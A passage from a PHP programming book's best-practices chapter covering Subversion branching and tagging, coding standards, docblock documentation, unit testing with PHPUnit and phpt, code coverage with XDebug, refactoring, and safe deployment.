features or backward compatibility breaks from creeping into released code. You
can also selectively merge bug fixes or new features from one branch to another
using your version control system’s merging capabilities. Here’s how the merge
command would be used in Subversion, for instance:
440   The PHP Anthology


       $ svn merge

       ➥ -r 123:145 trunk/filename branches/release-1.0.0/filename 



      However, an actual release needs to be static—that is, active development must
      have stopped—and we achieve this with tagging.

      In Subversion, tags and branches are created in the same way—via the “copy” oper­
      ation. The only difference between them lies in the conventions that surround their
      use. Branches should indicate ongoing development, such as bug fixes, new features,
      and the like; tags should be considered static snapshots.

      One aspect to note is that in Subversion, copies are achieved using hard links, and
      not actual file copies; new files are only created when a new version is checked in
      against the copy. This means that copies are cheap, so you can—and should—branch
      and tag often.

      “Wait!" you say. “I’m not developing software—I’m developing a web site! How
      does this apply to me?” Easy now; you still need to be able to keep your development
      and production versions of the site separate, and your tags should represent points
      at which you launch bug fixes or new features on the site:

       project/

           branches/

               production/

           tags/

               2006-09-19-PirateDayJargon/

               2006-05-11-LifeUniverseEverything/

               2006-04-01-AprilFools/

           trunk/ 



      On a day-to-day basis, you work in the repository trunk. As you finish features or
      bug fixes, you merge them into the production branch. You then preview this branch
      on your staging server, which is almost identical to the production server—it may
      even use the same data, pulled from the same web services. Once you’ve verified
      the changes, or your quality assurance team has reviewed the site and given its seal
      of approval, you create a tag. You can then export the project files from this tag:
Best Practices     441


 $ svn export

 ➥	 http://example.com/svn/project/tags/2006-09-19-PirateDayJargon
 ➥	 2006-09-19-PirateDayJargon


svn export grabs code from the repository and creates a local working copy without
the versioning information (that is, the.svn subdirectories). This gives you a leaner,
production-ready code tree to deploy.


How can I write distributable code?
When you’re working in a team, or writing code that will be released to the public,
you need to keep several points in mind:

■	 Code should be easily reused and extended.
■	 Code should be easily readable.
■	 Code files should be easily found in the file system.

Common problems developers run into when they’re working on others’ code, or
they’re using or extending third-party code, include:

■	 difficulty extending code due to inflexible APIs (or lack of an API), or unclear
   inheritance (for example, how do you extend procedural code?)

■	 naming collisions as a result of poor naming practices such as using common
   names when creating a class (for example, Mail)

■	 difficulty reading other people’s code because of inconsistencies with indentation;
   variable, function, class, and file naming conventions; and code structure

These are obviously separate problems, but all are related to the problem of failing
to write distributable code.

Solutions
Distributable code is all about adopting good habits. There’s no single, bullet-proof
solution to writing distributable code, but there are a few programming practices
you should adopt. Turning them into programming habits will also mean that
writing distributable code will take no extra effort at all. Let’s take a look at three
different programming practices you should consider.
442   The PHP Anthology

      Using OOP
      If you haven’t done so yet, make sure you read “What is OOP?” in Chapter 1. Object
      oriented programming (OOP) is often derided by performance experts as being very
      costly to an application’s performance.6 The counter-argument is that CPU cycles
      and memory are cheap, while developers are not. OOP provides incredible benefits
      to developers: object oriented code is very easily reused and extended, it’s typically
      easier to test because of the testing frameworks now available in PHP, it can reduce
      the number of naming collisions drastically, and it can lead to shorter syntax in
      many cases. Consider the following example:

                                                                                          oop.php (excerpt)

          class Foo
          {
            public function bar()
            {
              echo 'Do';
            }
          }

          class MyFoo extends Foo
          {
            public function bar()
            {
              parent::bar();
              echo ' more!';
            }
          }



      Class Foo has a bar method. Class MyFoo extends class Foo and overrides the bar
      method. This technique allows a MyFoo object to access the functionality of its parent
      class by calling parent::bar, and then add its own functionality to the do method.
      The beauty of this approach is that the objects are now interchangeable—we can
      use either Foo or MyFoo, depending on the situation, and the method syntax remains
      exactly the same. We can instantiate an object of either class, pass it to other methods
      or functions, and use either object in exactly the same way without needing to know
      which class it encapsulates:



      6
          For documentation of PHP 5’s OOP feature set, visit http://www.php.net/oop5/.
Best Practices    443


 $foo = new Foo();

 $foo->bar();


 $foo = new MyFoo();

 $foo->bar();



If we wanted to achieve the same end using procedural functions, the equivalent
code might look like this:

 function foo_bar()

 {

   echo 'Do';

 }


 function myfoo_bar()

 {

   foo_bar();

   echo ' more';

 }


 myfoo_bar();



The actual function call is certainly faster now that we don’t have to instantiate an
object, although this benefit is moot with static methods. The downside is that we
can’t simply call foo_bar() and get the new behavior—we have to call an entirely
different function.

If we want to be able to dynamically call a method of our choosing elsewhere in
the application, we can’t hard-code the function call; instead, we need to pass a
function name or PHP callback. This approach could decrease performance, and
also makes debugging and testing more difficult.

Let’s also consider that we may well need to implement similar functionality, but
with radically different internals. As an example, we might want to create two dif­
ferent mail functions: one that sends email using the PHP mail function, and another
that sends it via SMTP. I’ve witnessed situations where both functions were named
mailer, which led to naming conflicts later when both files were loaded simultan­
eously. If we incorporate these functions into classes instead, using, say My_Sendmail
and My_Smtp as class names, we remove the conflict:
444   The PHP Anthology


       class My_Sendmail

       {

         public function mailer($to, $subject, $body){}

       }


       class My_Smtp

       {

         public function mailer($to, $subject, $body, $host ='localhost'){}

       }



      I mentioned earlier that classes are also easier to test than procedural code. This is
      because the popular and well-documented unit testing frameworks, SimpleTest and
      PHPUnit, were designed primarily to test class methods, and even define their test
      suites, using classes:

                                                                          oop.php (excerpt)

       class FooTest extends PHPUnit_Framework_TestCase
       {
         /**
          * Foo Object
          * @var Foo
          */
         protected $_foo;
         /**
          * Setup environment
          */
         public function setUp()
         {
           $this->_foo = new Foo();
         }
         /**
          * Teardown environment
          */
         public function tearDown()
         {
           unset($this->_foo);
         }
         /**
          * Test the bar() method
          */
         public function testBar()
         {
Best Practices       445


           ⋮ test the method…
      }

    }




Writing object oriented code makes unit testing more intuitive and flexible—each
test method tests a method in a class. Should you wish to investigate further, you
can read about additional testing strategies on the SimpleTest and PHPUnit web
sites detailed in this chapter’s introduction.

Choosing a Namespace
We’ve mentioned naming conflicts once already. Just because you’re using OOP
now doesn’t mean you’re out of the woods; class names may still conflict. The easy
way to avoid the problem is to choose a namespace, a name prefix generally based
on the project name or vendor name, with which to prefix your classes.7Here are
some examples of namespaces that are in use within existing projects:

■ Solar Framework: Solar_
■ Zend Framework: Zend_
■ Cerebral Cortex: Crtx_

Using a namespace has several benefits. Firstly, it provides a very easy way to sep­
arate your code from that of other projects. If you make your code available through
a PEAR channel, for instance, having your own prefix means that your code will
be grouped under a single tree within your local PEAR checkout.

Secondly, as I’ve already mentioned, selecting a namespace helps to prevent naming
conflicts. Uri may be the minimally most descriptive name needed to describe your
class, but it could then conflict with another vendor’s Uri class; prefix it with your
own namespace, and the problem is avoided: Zend_Uri, Solar_Uri, My_Uri.

What should you use for your namespace? If you represent a company or a public
project, try to use its name—after all, this approach is good enough for Solar and
Zend. Also, try to keep the name short; you’ll appreciate not needing to type as
many keystrokes every time you create a new class definition. That said, a name
can be too short—you should probably use no fewer than three characters in order

7
  For a good discussion of the value of namespaces, read Paul M. Jones’s blog entry “No More Loners!”
at http://paul-m-jones.com/blog/?p=215.
446   The PHP Anthology

      to ensure that the name is unique and spells something recognizable. Crtx, for in­
      stance, is recognizable as a truncation of “Cerebral Cortex;” anything shorter would
      be unrecognizable; Cortex itself starts to get lengthy as a prefix; CerebralCortex
      is simply too long to be usable.

      Choosing a Coding Standard
      How many times have you reformatted a coworker’s (or former employee’s) code
      to make it more readable? How many times has someone done the same to your
      code? We can consider such actions to be a net loss of coding time.

      Chances are that if this has happened too much in your shop, you’ve probably
      already decided to create a coding standard. Coding standards dictate:

      ■ file naming and placement
      ■ variable, function, and class naming conventions
      ■ indentation rules
      ■ documentation and comment guidelines

      … and much, much more.

      Rather than creating your own standard, consider adopting a public standard. The
      benefits of using a public standard include:

      It’s programmer-neutral.
           Instead of one programmer or group of programmers dictating their own prefer­
           ences, choosing a public standard is a programmer-neutral solution.

      The issues have been settled.
         A public standard will have undergone heavy debate already. While not everyone
         will be able to agree that the outcome is the best one, everyone has agreed that
         the standards represent the best collective solutions.

      Use it as hiring criterion.
         When adopting a public standard, you can use it as a criterion of employment:
         “Applicant must know and be able to use XYZ Coding Standards.”

      It’s better for code distribution.
           For instance, if you’re following PEAR Coding Standards, your code will be in
           a format—both the physical, on-disk format, as well as the format in which the
Best Practices    447

    code is written—that can easily be packaged and installed using the PEAR in­
    staller, or via a PEAR channel.

So, what public standards exist? Some popular examples include:

■	 PEAR, at http://pear.php.net/manual/en/standards.php
■	 Zend Framework, at http://framework.zend.com/manual/en/coding-standard.html
■	 eZ Components, at http://svn.ez.no/svn/ezcomponents/docs/guidelines/

With some additions of their own, these coding standards were all originally derived
from the Horde project.8 Horde and PEAR coding standards are identical at this
point. Zend Framework standards basically follow those of PEAR, with a few slight
changes; all in all, however, Zend Framework remains compatible with PEAR. eZ
Components standards are basically only used by the eZ Components project and
those developers who code with it.

PEAR coding standards are widely adopted, and used in other high-profile projects
such as ADOdb9 and Solar.10 Overall, when it comes to a choosing a standard to
adopt for your project or company, PEAR’s standards are probably the best option.

The basics of PEAR coding standards are summarized as follows:

■	 There is one class per file.

■	 Underscores in class names map to the directory separator: for example, Net_SMTP
   maps to Net/SMTP.php.

■	 There is One True Brace: class and function declarations have the opening brace
   on the following line at the same indentation level as the declaration; in other
   control structures, the opening brace remains on the same line as the statement.

■	 Code indentation should equal four spaces per indentation level.

■	 Variables, functions, and classes are named using camelCase or studlyCaps;
   variable and function names should begin lowercased, while classes should begin
   uppercased.


8
  http://horde.org/
9
  http://adodb.sourceforge.net/
10
   http://solarphp.com/
448   The PHP Anthology

      ■	 Private and protected properties and methods should be named with a leading
         underscore.

      ■	 All classes, functions, and methods should have a docblock.

      All the examples in this chapter are written using PEAR coding standards.

      Discussion
      Writing distributable code is achievable once you adopt a few useful habits. Writing
      object oriented code may not give your projects a performance advantage, but it will
      help you develop code faster, as you’ll be able to easily reuse code that you or others
      have already written. Choosing a namespace for your code will help prevent colli­
      sions with code written by other developers, and provides for the easy grouping of
      different code bases in the directory tree. Finally, using a coding standard lets you
      ensure that you’ll be able to maintain the code of your fellow programmers, and
      vice versa.


      How can I document my code for later
      reference by myself or others?
      You’ve written the next great API, and you’re all ready to release it. But nobody,
      including your coworkers, knows how to use it. What methods are available? What
      arguments do they take? What do they return? What do they actually do? Why would
      anyone want to use them?

      The topic of documentation is often skimmed over during the coding phase, but as
      you can see from these questions, a lack of documentation can make your code ba­
      sically worthless to others.

      “But I don’t have time to document!” you protest. “Documentation is too hard!”
      This is simply not true. Documentation can be created while you code, as part of
      your code. Let’s see how.
Best Practices     449


Solution
phpDocumentor uses specially formatted comment blocks, called docblocks, within
the code itself to generate documentation.11 Docblocks have existed for a number
of years, having originally been written to support PHP 4 code, and are based on
Javadoc.12 Docblocks start with an opening /** , and then follow regular C-style
comment format. Multiline comment blocks should start with a *. Here’s an example:

                                                                 login.php (excerpt)

 /**
  * This is a sample docblock
  *
  * This is a sample docblock. Content prior to the first empty line
  * of the comment block is called the 'short description'; this
  * content here is considered the 'long description'.
  */



Docblocks can also contain tags that provide meta information, such as the function
or method parameters and return value types, the exceptions thrown, and more. As
an example, consider the following function declaration:

                                                                 login.php (excerpt)

 /**
   * Login a user
   *
   * Logs in a user, applying their credentials against those found in
   * the database.
   *
   * @param string $user Username
   * @param string $password User's password
   * @return boolean
   * @throws Exception on database error
   */
 function login($user, $password)
 {
    ⋮ function body…
 }



11
     http://phpdoc.org/
12
     http://java.sun.com/j2se/javadoc/
450   The PHP Anthology

      Running this declaration through phpDocumentor is a fairly simple exercise:

       $ phpdoc -f login.php -t docs 



      This action creates a documentation tree inside the docs directory, and parses only
      the login.php file. The documentation generated for this function can be seen in
      Figure 13.1.




                     Figure 13.1. Documentation generated with the phpDocumentor and docblocks


      You can link documented code using two different mechanisms. Any given docblock
      may contain one or more @see tags, each of which should have: a single argument;
      a class, function, or method name; or a documented constant, variable, object
      property, or object constant. An optional second argument can be used to provide
      information about the link. Alternatively, you can generate inline links using the
      {@link argument comment} syntax; the argument is the same as the one we used
      for @see, and the comment we provide will become the text that will be linked (if
      none is provided, the argument is used). Here’s an example:
Best Practices    451

                                                                   login.php (excerpt)

 /**
   * Validate a password
   *
   * Validates a password for {@link login() the login function}.
   *
   * @see login() Login function
   * @param string $user Username
   * @param string $password User's password
   * @return boolean
   */
 function validatePassword($user, $password)
 {
    ⋮ function body…
 }



What can be documented with docblocks? Well, a file can have a page-level docblock
that describes the contents of the file, its author, copyright information, and so on.
Classes can have a docblock describing the class, inheritance, and more. Functions
and methods may have docblocks, as we saw previously. Additionally, any class
member variable can have a docblock. In short, any element of the code can have
a docblock.

Discussion
The main points to note about phpDocumentor-style code comments are:

■ Documentation resides with the code.
■ Documentation refers to the code it precedes.
■ Docblocks make your code self-documenting.

Knowing these points, you really have no reason not to document your code; so as
you code, document away to your heart’s content. As you’re doing so, keep a few
points in mind:

Use both short and long descriptions, unless they’re basically identical.
   In the example above, the long description provides additional information
   that’s not necessary for a short synopsis, but gives good information to the de­
   veloper using it. Often, the parameters and return value provide plenty of in­
   formation, so you don’t need to use the long description.
452   The PHP Anthology

      Use the most specific parameter and return value types you can.
         For instance, don’t just use a type of object or stdclass if something more
         specific will work, such as Solar_Db_Adapter. This type will allow you link to
         the appropriate class, producing even better documentation; additionally, some
         IDEs will use such type hinting to better provide code completion.

      Another point to keep in mind is that phpDocumentor is not the only tool that can
      parse docblocks. Another tool that can utilize the same docblocks and docblock
      tags as phpDocumentor to create API documentation is Doxygen.13 The benefit to
      using Doxygen is that it supports languages other than PHP, such as C, C++, Java,
      and Python, and can generate documentation accordingly.

      Note also that docblocks are associated with compiler tokens in PHP itself, which
      means that they may be retrieved through PHP’s Reflection API using the
      getDocComment method of any of the various Reflection classes. This ability can
      be useful when you want to program some form of self-discovery into your
      code—when you’re creating server classes, for instance. Zend Framework makes
      use of this capability in its various server components (Zend_XmlRpc_Server,
      Zend_Rest_Server, Zend_Json_Server, and Zend_Soap_Wsdl) in order to have service
      classes generate their own server definitions.

      Finally, many IDEs will use docblocks to provide code completion functionality.
      For example, as you type into Zend Studio and Eclipse, tool tips and drop-downs
      appear, displaying the possible methods of an object and the prototype for each
      method, as Figure 13.2 illustrates. It’s easy to select the entry you want to use from
      the list and save keystrokes in the process.




      13
           http://www.stack.nl/~dimitri/doxygen/
Best Practices   453





                Figure 13.2. IDE autocompletion based on PHP docblocks (Zend Studio)



      Comments can Tell Lies!
     Programmers always have the best of intentions when they implement a system­
     atic approach to using code comments. However, as time goes by and functions
     are patched, enhanced, or otherwise changed, the code comments will slowly
     become out of date unless they’re rigorously maintained. When you read someone
     else’s code comments, remember that they may have written those comments for
     the function as it was implemented three versions ago, which may not reflect how
     the function actually works today. When you approach your own code, try to be
     as accurate as possible with your commenting, but complement your docblocks
     with good unit test cases—we’ll look at unit testing in “How can I ensure future
     changes to my code won’t break current functionality?”. A good unit test suite
     can serve as functional documentation, too, as it documents how the code will
     behave when called.


So, start documenting your code today—you’ll never look back!
454   The PHP Anthology


      How can I ensure future changes to my
      code won’t break current functionality?
      Your application has been in production for a month, and all is well, but your boss
      has requested a new feature. You create the new functionality, roll it out, and then,
      within minutes, you have an angry call from your boss, who complains that some­
      thing’s broken on the site.

      How many times has this happened to you? How can you prevent it from ever
      happening again? Try out one of the unit testing frameworks available to PHP.

      Solutions
      The goal of unit testing is to isolate code into distinct units and verify that each of
      those units satisfies all your criteria.14 When they’re run after refactoring processes
      or the introduction of new features, unit tests are often referred to as regression
      tests, and are used to check that the changes have not broken existing functionality.

      Typical testing frameworks have you run code and make assertions against the return
      values or object state. The examples that follow all reference this code:

                                                                                         Foo.php (excerpt)

       /**
         * Foo class for PHP Anthology Best Practices chapter
         *
         * @package SitePoint
         * @version @release-version@
         * @copyright Copyright (C) 2006-Present, SitePoint Pty Ltd.
         * @author Matthew Weier O'Phinney <XXX@YYYY.ZZZ>
         */
       class Foo
       {
          /**
           * @var string
           */
          public $name;
          /**


      14
         Wikipedia has an entry on unit testing, along with references to many unit-testing resources, at
      http://en.wikipedia.org/wiki/Unit_testing.
Best Practices   455


    * @var boolean

    */

   public $baz = false;

   /**

    * Constructor

    *

    * @param string $name

    * @return void

    * @throws Exception with non-string $name

    */

   public function __construct($name)

   {

     if (!is_string($name) || empty($name)) {

       throw new Exception('Invalid name');

     }

     $this->name = $name;

   }

   /**

    * Bar returns an array

    *

    * @return array

    */

   public function bar()

   {

     return array(

         'baz',

         'bal',

         'boo'

     );

   }

   /**

    * Set the {@link $baz} flag

    *

    * @param boolean $flag

    * @return void

    */

   public function baz($flag)

   {

     $this->baz = ($flag) ? true : false;

   }

 }




Let’s look at an example of unit testing performed on the code above:
456   The PHP Anthology


       $object = new Foo('sitepoint');

       $result = $object->bar();

       $this->assertTrue(is_array($result));

       $this->assertContains('bar', $result);



      In this test, we assert that the return value of the Foo object’s bar method is an array
      and contains the value bar as one element.

      Three principal testing frameworks are used by most PHP projects:

      phpt (http://qa.php.net/write-test.php)
         The testing format used by the PHP project itself, phpt is primarily found in
         unit tests written for PEAR modules.

      PHPUnit (http://phpunit.de/)
         Originally a PEAR project, but now a standalone project, PHPUnit is a faithful
         port of Java’s JUnit.15 PHPUnit is written in PHP 5, supports E_STRICT, and is
         targeted largely at OOP code.

      SimpleTest (http://www.lastcraft.com/simple_test.php)
         Written in the early days of PHPUnit to address the lack of Mock Objects and
         web testing functionality, SimpleTest supports PHP 4, and PHP 5 when it’s not
         set to report E_STRICT errors.

      Testing Using SimpleTest or PHPUnit
      SimpleTest and PHPUnit test cases are written as classes, and will typically test an
      entire class or file of functions at a time. The basic testing strategies of these
      frameworks are very similar, having only minor differences. I use PHPUnit in the
      examples to come, partly in order to build on it in upcoming sections; however, the
      code could be written in SimpleTest with very few changes.

      In this example, we’ll test the entire Foo class:

                                                                         unittest.php (excerpt)

       /**
        * Test class for class Foo
        *


      15
           http://www.junit.org/
Best Practices   457


 * @uses PHPUnit_Framework_TestCase

 * @package Sitepoint

 * @subpackage UnitTests

 * @copyright Copyright (C) 2006-Present, SitePoint Pty Ltd.

 * @author Matthew Weier O'Phinney <XXX@YYYY.ZZZ>

 */

class FooTest extends PHPUnit_Framework_TestCase

{

  /**

   * @var Foo

   */

  protected $_foo;

  /**

   * Setup test environment

   *

   * @return void

   */

  public function setUp()

  {

    $this->_foo = new Foo('sitepoint');

  }

  /**

   * Tear down test environment

   *

   * @return void

   */

  public function tearDown()

  {

    unset($this->_foo);

  }

  /**

   * Verify that the constructor properly sets the name attribute

   *

   * @return void

   */

  public function testConstructorSetsName()

  {

    $this->assertEquals('sitepoint', $this->_foo->name);

    $foo = new Foo('anthology');

    $this->assertEquals('anthology', $foo->name);

  }

  /**

   * Verify that non-string $name arguments cause the constructor 

   * to throw an exception

   *
458   The PHP Anthology


          * @return void

          */

         public function testConstructorThrowsExceptionOnBadName()

         {

           try

           {

             $foo = new Foo('');

             $this->fail('Empty string should throw exception');

           }

           catch (Exception $e)

           {

             // success

           }

           try

           {

             $foo = new Foo(array('boo', 'bar'));

             $this->fail('Array should throw exception');

           }

           catch (Exception $e)

           {

             // success

           }

           try

           {

             $foo = new Foo(new Stdclass());

             $this->fail('Object should throw exception');

           }

           catch (Exception $e)

           {

             // success

           }

           try

           {

             $foo = new Foo(true);

             $this->fail('Boolean should throw exception');

           }

           catch (Exception $e)

           {

             // success

           }

         }

         /**

          * Verify Foo::bar() returns an array containing the value 'bar'

          *

          * @return void
Best Practices    459


    */

   public function testBar()

   {

     $bar = $this->_foo->bar();

     $this->assertTrue(is_array($bar));

     $this->assertContains('bar', $bar);

   }

   /**

    * Verify that baz() sets the $baz property

    *

    * @return void 

    */

   public function testBazSetsBazProperty()

   {

     $this->_foo->baz(true);

     $this->assertTrue($this->_foo->baz);

     $this->_foo->baz(false);

     $this->assertFalse($this->_foo->baz);

     $this->_foo->baz(1);

     $this->assertTrue($this->_foo->baz);

     $this->_foo->baz(0);

     $this->assertFalse($this->_foo->baz);

   }

 }




In this example, the setUp method is called prior to each test case being run, and
creates a Foo object. The tearDown method is called after each test case, and, in this
instance, unsets the Foo object in the test suite.

Any method that begins with the word test is a test method. In the examples we’ve
covered, I’ve named each method to reflect either the class method being tested, or
the behavior I’m testing. Thus, the name testConstructorSetsName indicates that
this method will test that the constructor (__construct) sets the $name property in
the object correctly.

Behavioral testing such as this is particularly useful because as well as serving as
contracts for the objects, the test cases themselves can serve as agile documenta­
tion—documentation automatically generated from unit tests. PHPUnit will generate
agile documentation based on unit test names. For example, the documentation
generated for the method called testConstructorSetsName would be “Constructor
sets name.”
460   The PHP Anthology

      Testing Using phpt
      I skipped over phpt testing in the solution above, so let’s take a quick look at it now.
      phpt tests typically target a single function or method at a time, with the goal of
      breaking the functionality that unit provides. Test files are divided into several
      sections that define, at a minimum, the test name, the code to test, and the expected
      results. Tests are run via a script provided with the PHP distribution: run-tests.php,
      or the pear run-tests command.

      To test the Foo::bar method, we might write the following hypothetical test:

       --TEST-­

       Foo::bar() method

       --FILE-­

       <?php

       require_once 'Foo.class.php';

       $foo = new Foo('simpletest');

       $bar = $foo->bar();

       assert(is_array($bar));

       assert(in_array('bar', $bar));

       ?>

       --EXPECT-­



      You’ll note that the --EXPECT-- section here is empty. The idea is that no output
      is expected; the test will fail if any output—such as a warning from the assert
      statements—is generated.

      This next example sets up a testing scaffold that includes the source PHP file for
      the class to test, and creates the object to test. There are no formal procedures for
      creating test scaffolds with phpt tests, but one common convention is to create a
      setup.php.inc file, like so:

                                                                                setup.php.inc

       <?php
       require_once 'Foo.class.php';
       $foo = new Foo('simpletest');
       ?>



      That file performs the setup for us; we then require it in our test script:
Best Practices    461

                                                                    phpt.php (excerpt)

 --TEST-­
 Foo::bar() method
 --FILE-­
 <?php
 require_once 'setup.php.inc';
 $bar = $foo->bar();
 assert(is_array($bar));
 assert(in_array('bar', $bar));
 ?>
 --EXPECT-­



phpt tests are generally very easy to write, and offer the advantage that each test is
run in its own environment so, for instance, you don’t have to worry about resetting
static variables values between requests. The big disadvantages of phpt tests are the
lack of a formal method for the setup and teardown of test environments, and the
proliferation of files that occurs when we test classes with many methods.

Discussion
Additional reasons to choose a testing framework like SimpleTest or PHPUnit over
phpt include:

phpt lacks formal methods for assertions.
   Certainly, PHP’s own assert function offers the same functionality, but methods
   like assertTrue and assertContains have better names that indicate the type
   of assertion being made, and contain their own error handling functionality to
   ensure that the arguments provided conform to those expected.

phpt lacks formal methods for setting up and tearing down the test environment.
   While phpt offers mechanisms for setting up the request environment, they
   need to be performed in each test file; this deficiency also makes it difficult to
   share environments between tests.

phpt lacks mechanisms for sharing testing functionality between tests.
   In PHPUnit and SimpleTest, any method that doesn’t begin with the word test
   is just another method in the class, which means that you can create a more
   generalized method and call it from the individual test methods if several tests
   use similar testing strategies. The ability to easily share an environment without
462   The PHP Anthology

             needing to load additional files or classes is especially useful, for obvious
             reasons.

      If SimpleTest and PHPUnit are so similar, how can you choose one over the other?
      The tool you use will depend on what you’ll be testing, and the test strategies you’ll
      use. Each testing framework has features that the other does not (although the feature
      sets are converging as the years progress). For example:

      ■	 PHPUnit includes support for code coverage reports (using XDebug; this topic
         is covered later in “How can I determine what remains to be tested?”).

      ■	 SimpleTest contains support for Mock Objects (PHPUnit 3 introduces this cap­
         ability).

      ■	 SimpleTest has web testing functionality (PHPUnit 3 introduces this capability
         through a third-party tool, Selenium RC).

      ■	 SimpleTest has a very active user community.

      I use PHPUnit extensively, mainly because it suits the projects I contribute to and
      the coding standards that I follow, yet I’ve met many developers who swear by
      SimpleTest. Choose one testing framework and learn its ins and outs—and invest­
      igate the other to compare their strengths and weaknesses.

      Unit testing is a broad topic, and much of the information presented here is, by
      necessity, abbreviated. Choose a testing framework that suits your needs, and read
      up on the documentation for that framework as you start to write your tests. You
      may want to read up on unit testing in general as well.

      One subject that I haven’t covered here is the concept of Test Driven Development
      (TDD), or Test First Development. The basic tenet of TDD is to write unit tests first,
      then your code, and repeat the process until your project is complete. Many de­
      velopers practice this strategy; it has many benefits, particularly when you refactor
      code or add features. For more information on TDD, see the Portland Pattern Repos­
      itory wiki,16 and ExtremeProgramming.org.17




      16
           http://c2.com/cgi/wiki?TestDrivenDevelopment
      17
           http://www.extremeprogramming.org/rules/testfirst.html
Best Practices        463


How can I determine
what remains to be tested?
Regardless of whether you’re using Test Driven Development or writing your tests
after the fact, eventually you’ll need to know how much of your code has actually
been tested. Often, even though your tests are passing, substantial portions of your
code won’t have been exercised by your tests. How can you determine which code
has been exercised, and which has not?

Solution
PHPUnit 3 provides the ability to generate code coverage reports.18 This feature
requires XDebug to be installed on your machine. You can obtain XDebug via PEAR
or PECL, or download the extension yourself.19 In my experience, users of *nix­
based machines will need to compile the extension themselves. To do so, use the
following steps, substituting the appropriate paths, of course:20

 $   cd /path/to/xdebug/sources 

 $   /path/to/phpize 

 $   ./configure —with-php-config=/path/to/php-config 

 $   make 

 $   make install 



Once XDebug is installed, you’ll need to enable the extension in your php.ini file.
Since this extension needs to interact with the Zend Engine, you must enable it as
a zend_extension:

 zend_extension = /full/path/to/xdebug.so 



The full path is absolutely necessary if the extension is to be found by the PHP en­
gine.




18
   For documentation on PHPUnit’s code coverage report facilities, read the online documentation at

http://www.phpunit.de/pocket_guide/3.0/en/code-coverage-analysis.html.

19
   http://xdebug.org/

20
   I originally covered this process in a blog entry entitled, “Getting XDebug Working with PHPUnit For

Code Coverage Reports,” at http://weierophinney.net/matthew/.
464   The PHP Anthology

      You’ll also want to disable the extension by default (there’s no need to slow down
      your site unless you’re actually doing some profiling or checking code coverage).
      This can also be done in your php.ini:

       xdebug.default_enable = Off 



      While the code coverage reports run from the CLI, you may need to restart your web
      server after all the installation tasks and INI changes have been performed.

      Once XDebug is available, generating code coverage reports is as easy as throwing
      another switch to PHPUnit:

       $ phpunit --report UnitTest 



      The --report switch expects a directory argument. When it’s run in this fashion,
      PHPUnit generates code coverage reports after the tests are performed, and saves
      them as HTML files in the directory you specify. You can then browse these reports
      in a web browser. For example, Figure 13.3, shows the report I generated while
      developing the Zend_Controller class in the Zend Framework.
Best Practices   465




                Figure 13.3. Code coverage report generated with PHPUnit and XDebug


As you can see by the legend in Figure 13.3, it defines three thresholds of code
coverage:

■ 0–35%: low
■ 35–70%: medium
■ 70–100%: high

You can then drill down into individual files. A sample from
Zend_Controller_Action is shown in Figure 13.4.
466   The PHP Anthology




      Figure 13.4. Code coverage analysis of Zend_Controller_Action showing a sampling of untested, dead, and tested
                                                          code


      In a web browser, code coverage report output is color coded, with green marking
      code that has been executed, red marking code that was not executed, and orange
      marking “dead” code, or code that will never be executed (usually end braces).
      Comments, as well as function and class definitions, are never considered in code
      coverage.

      By generating these reports frequently, you can quickly determine which files need
      more coverage, and which code needs testing.


               Don’t Hold Out for 100%!
             True, 100% code coverage is impossible to achieve in most cases, though the report
             may show that it has been achieved. Often, code will be written to account for
             many different situations, and testing even one of those will exercise it—but there’s
Best Practices   467

      no way to test all cases. The general rule of thumb holds that test coverage of 85%
      or greater is excellent.



I’ve reviewed some of my old code, and it’s
horrible. How can I make it better?
Of course, you’re one of those good developers who maintains their code rigorously,
or, at the very least, you occasionally go back and review code you wrote six months
or a year ago, right? And, as you learn new techniques or new approaches to prob­
lems, the code you wrote before suddenly looks like a mess of tangled, overcooked
spaghetti.

Solution
The solution to the old-code nightmare is summed up in a single word: refactoring.
Quite simply, refactoring is the act of revising a program to make it more readable,
or incorporating better structure, while preserving the program’s functionality.

If your code has been unit tested previously, you have a great foundation for under­
taking such a task. Create a new branch in your revision control system and start
hacking away at your code. Run the existing tests regularly as you work to ensure
that nothing breaks. Based on your changes, you may need to add new unit tests.
Be wary of altering the existing unit tests, however, as this may lead to incompatib­
ilities.

If the code in question has not been tested previously, you have a bit more work to
do. Your first step should be to write unit tests for the existing code. This approach
will effectively produce a contract for the new code, which must pass these tests.
Additionally, in writing the tests, you’ll likely identify which areas of the code are
most brittle and need to be rewritten, and uncover some bugs. Once your tests are
finished, start the process of rewriting, running your test suite often.
468   The PHP Anthology


      Discussion
      Refactoring is a complex topic, and the solution presented here is the briefest of
      summaries. If you’d like to dig into a thorough discussion of the subject, I recommend
      a classic reference: Martin Fowler’s Refactoring.21


      How can I deploy code safely?
      As PHP developers, we don’t release code in the typical development model: code,
      build, package, release. More often than not, we find ourselves making tweaks on
      live systems, or deploying code directly onto a live web site.

      Problems arise in these situations, as we introduce the possibility of site breakage.
      How many times has a fix or a new feature broken your web site? How many times
      have you needed to roll back to the previous version of a project, but had no clean
      way to do so?

      With any luck, you’re already on the way to solving many of these problems by
      following the examples shown previously in this chapter:

      ■	 Use revision control software.
      ■	 Maintain separate development and production branches of your site in your
         versioning system.
      ■	 Tag your production branch prior to release.
      ■	 Write and run unit tests for your code.
      ■	 Make sure as much of your code as possible is being exercised by your unit tests.


      Solutions
      With those tools already in place, you have only a little way to go to reach the calm
      waters of safe code deployment.

      Using Tags and Symlinks
      First, set up a staging or quality-assurance server that can run off a checked-out
      copy of your production branch. This server can be a separate virtual host on the
      same machine as your production server (though that’s not recommended), or on a



      21
           Martin Fowler, Refactoring (Reading, MA: Addison-Wesley Professional, 1999).
Best Practices     469

separate server entirely, preferably behind a firewall (you guessed it—this approach
is recommended).

Once you’ve merged your changes from the development branch or trunk into your
production branch, test the site. Use unit tests as well as testing visually, using a
browser—looking at your project can often reveal issues that your tests simply
cannot find.

Once you’re confident that the site works to your satisfaction—or even better, to
your boss’s or client’s satisfaction—tag the production branch. I usually name my
tags with a combination of the date and a summary of the changes being introduced,
something like this:

 $ svn copy https://example.com/svn/project/branch/production

